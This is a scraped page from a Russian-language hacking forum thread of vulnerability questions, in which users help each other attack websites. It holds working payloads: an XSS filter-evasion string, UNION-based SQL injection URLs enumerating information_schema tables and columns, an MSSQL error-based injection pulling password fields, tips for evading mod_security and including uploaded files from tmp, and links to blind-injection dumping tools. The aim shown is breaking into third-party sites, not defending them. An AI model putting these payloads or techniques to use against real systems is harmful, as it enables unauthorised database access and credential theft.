Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. cr0w

    cr0w Elder - Старейшина

    Joined:
    11 Sep 2008
    Messages:
    92
    Likes Received:
    141
    Reputations:
    33
    Code:
    <IMG SRC="jav[TAB]ascript:alert('XSS');"> 
    и
    Code:
    < scr ip t >
    это всеже совершенно разные вещи - в первом случае ты TAB вставляешь в атрибут тега, а во втором - в имя тега. Любой нормальный браузер вообще не будет это интерпретировать как тег.
     
  2. desTiny

    desTiny Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    1,006
    Likes Received:
    444
    Reputations:
    94
    diznt, тогда меняй сканер )
     
  3. Grookle

    Grookle New Member

    Joined:
    11 Apr 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток Товарищи.Имеется инъекция в которой выводятся база юзер и версия но при попытке вывода таблиц из INFORMATION_SCHEMA появляется ошибка Not Acceptable

    An appropriate representation of the requested resource /sex.php could not be found on this server.

    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
    Apache Server at www.site.com Port 80
    Кто нибудь сталкивался с этим?
     
  4. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Grookle сылку в студию
    посмотрим что у вас там
    так просто нельзя что нибуть сказать
     
  5. Grookle

    Grookle New Member

    Joined:
    11 Apr 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Skinul v LS
     
  6. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    Grookle, mod_security мещает. пробуй разные запросы
     
  7. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Grookle линк в студию...
     
  8. n1ceque

    n1ceque New Member

    Joined:
    26 Mar 2009
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    как можно обойти HIDE в темах Vbulletin...??
     
  9. AngelOfFaith

    AngelOfFaith Member

    Joined:
    2 Feb 2009
    Messages:
    6
    Likes Received:
    5
    Reputations:
    0
    Можно ли здесь чёта провернуть:
    $update = mysql_query("UPDATE `chat_users` SET `time` = '".$online."', `place` = 0, `ip` = '".getenv('REMOTE_ADDR')."', `ua` = '".htmlspecialchars(getenv('HTTP_USER_AGENT'))."' WHERE `id` = '".$id."';");

    если вставить свой код в HTTP_USER_AGENT? И если да то какой код надо? Заранее спс за ответ
     
  10. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Ну да. бенчмарк можно заюзать или мор1ров. Будет что-то вроде такого пакета

    А это тебе виднее. Чего ты хочешь добиться то от инъекции ?
    Рекомендую почитать http://forum.antichat.ru/thread35207.html



    https://forum.antichat.ru/showthread.php?t=26987
    С тех пор ничего не изменилось =)
    Я надеюсь ты не на нулледе хайды хенкать хоч ?)) А то люди значит постят, стараются, работают на коллективное благо так сказать, а ты на все готовенькое хочешь ? Не хорошо, товарищ, не хорошо
     
    #6770 ElteRUS, 26 Apr 2009
    Last edited: 26 Apr 2009
  11. AngelOfFaith

    AngelOfFaith Member

    Joined:
    2 Feb 2009
    Messages:
    6
    Likes Received:
    5
    Reputations:
    0
    хм, я читал эту статью только у меня постоянно белая страница вылазит(((
    Как с этим боротся?
     
  12. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    tmp Должен быть доступен для записи....можешь туда залить...и инклудить при желании.
     
  13. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Подскажите здесь можно что то зделать, вот sql:
    union не выходит провести(возможно еще как то изменяеться запрос и т.п. а возможно и бд не держит), а при blind как я понял фильтруються СКОБКИ.

    БД по всей видимости MySQL:
    но вот скобки скрипт по всей видимости не переваривает(именно одновременно 2-е скобки - открываюшиеся и закрываюшиеся):
    и в hex тоже
     
    #6773 PaCo, 27 Apr 2009
    Last edited: 27 Apr 2009
    1 person likes this.
  14. Rav1n

    Rav1n Elder - Старейшина

    Joined:
    5 Nov 2008
    Messages:
    7
    Likes Received:
    21
    Reputations:
    11
    чем можно сдампить ms sql базу?

    чтобы руками не перебирать например такое
    =1'+or+1=(select+top+1+cast(aliase+as+nvarchar)+from+part_pass+where+inc=1)--
    1 потом 2,3 итд
     
  15. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    хз, вроде нету таких тулз. для мускуля есть сипт4. напиши скрипт пхп простенький
     
    1 person likes this.
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    http://pashkela.narod.ru/progi/bsqlbf-v2.1.zip
     
  17. none222

    none222 Guest

    Reputations:
    0
    Pangolin может, читал в обзоре, сам не пробовал
     
    1 person likes this.
  18. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    http://kachakil.com/papers/SFX-SQLi-Bin.zip (если mssql 2005/2008)
     
  19. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Каким запросом производить инъекцию в ibase?
     
  20. Conroe

    Conroe New Member

    Joined:
    27 Apr 2009
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    Помогите, пожалуйста, разобраться, только постигаю азы:
    запрос: news.php?id=-349+union+select+1,2,3,4,5,6,7,8,9--
    потом: news.php?id=-349+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables+limit+1,1--
    получаю имена таблиц:
    CHARACTER_SETS
    COLLATIONS
    COLLATION_CHARACTER_SET_APPLICABILITY
    COLUMNS
    COLUMN_PRIVILEGES
    KEY_COLUMN_USAGE
    PROFILING
    ROUTINES
    SCHEMATA
    SCHEMA_PRIVILEGES
    STATISTICS
    TABLES
    TABLE_CONSTRAINTS
    TABLE_PRIVILEGES
    TRIGGERS
    USER_PRIVILEGES
    VIEWS
    и т.д.
    далее пытаюсь определить столбцы, делаю:
    news.php?id=-349+union+select+1,column_name,3,4,5,6,7,8,9+from+information_shema.columns+where+ table_name='имя_таблицы'+limit+1,1--
    и тут тишина.... страница открывается ак же как при запросе: news.php?id=349'
    по version() выдает: 5.0.67-0ubuntu6
    как быть дальше?
     
Thread Status:
Not open for further replies.